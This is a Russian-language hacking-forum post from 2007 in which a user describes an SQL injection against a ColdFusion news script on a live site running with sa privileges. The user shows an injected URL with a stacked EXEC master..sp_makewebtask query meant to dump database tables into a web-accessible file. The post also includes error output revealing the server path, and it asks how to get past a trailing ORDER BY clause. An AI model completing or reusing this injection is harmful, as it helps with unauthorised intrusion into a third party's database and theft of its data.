Форум АНТИЧАТ - как закрыть order в запросе к mssql

как закрыть order в запросе к mssql

12.09.2007, 20:20

$jason$

Новичок

Регистрация: 12.04.2006

Сообщений: 22

Провел на форуме:
90532

Репутация: 3

как закрыть order в запросе к mssql

Всем привет! подскажите как закрыть 'Order'

инъекция в cfm скрипте,все таблицы ,колонки и т.д даёт нормально,права sa

хочу вывести таблицу в файл на сервере с помощью sp_makewebtask, в вебдиректорию

в сообщение о ошибке есть полный путь до вебдиры,и запрос к бд

Код:

site.com/dir/news.cfm?news_id=-1'

Код:

[Macromedia][SQLServer JDBC Driver][SQLServer]Line 2: Incorrect syntax near ''.
The error occurred in F:\www\site.com\www\dir\news.cfm: line 19
SQL	   SELECT * From News Where News_ID = -1'' Order By DisplayOrder

делаю запрос

Код:

http://site.com/dir/news.cfm?News_ID=1;%20EXEC%20master..sp_makewebtask%20%22F:\www\site.com\www\dir\output.html%22,%20%22SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES%22

Код:

[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'Order'. 
 
The error occurred in F:\www\site.com\www\dir\news.cfm: line 19

SELECT * From News Where News_ID = 1; EXEC master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES" Order By DisplayOrder

как закрыть этот ордер? повсякому пробовал пока неполучилось, проверяю потом site.com/dir/output.html нету файла